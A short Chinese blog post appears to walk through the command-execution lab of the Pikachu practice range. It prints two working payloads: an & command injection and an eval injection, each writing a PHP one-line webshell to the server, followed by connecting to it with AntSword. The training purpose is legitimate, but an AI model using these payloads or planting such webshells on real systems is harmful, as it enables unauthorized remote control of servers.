技术栈

Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

上一篇:红黑树
下一篇:云计算之网络
相关推荐
eventer123
1 分钟前
构建 HertzBeat Docker 镜像的技术实践
运维·docker·容器
深耕AI
10 分钟前
【wordpress系列教程】02 Blocksy主题
运维·服务器·前端
遇见火星
32 分钟前
Jenkins核心部署流程
运维·jenkins
gaize1213
2 小时前
服务器异常如何解决
运维·服务器
编程饭碗
2 小时前
【Java循环】
java·服务器·算法
dragoooon34
2 小时前
仿muduo库实现高并发服务器-面试常见问题
运维·服务器·面试
开***能
3 小时前
ASI转Profinet网关助力包装全产业自动化
运维·自动化
他是龙551
3 小时前
第29天:安全开发-JS应用&DOM树&加密编码库&断点调试&逆向分析&元素属性操作
开发语言·javascript·安全
petunsecn
3 小时前
安全审查--跨站请求伪造--同步令牌模式
安全
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04UV安装并设置国内源05React CVE-2025-55182漏洞排查与修复指南06Linux下V2Ray安装配置指南07BongoCat - 跨平台键盘猫动画工具08从入门到实战:Gemini 3 使用指南速览09在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)10本地部署阿里最新开源的Z-Image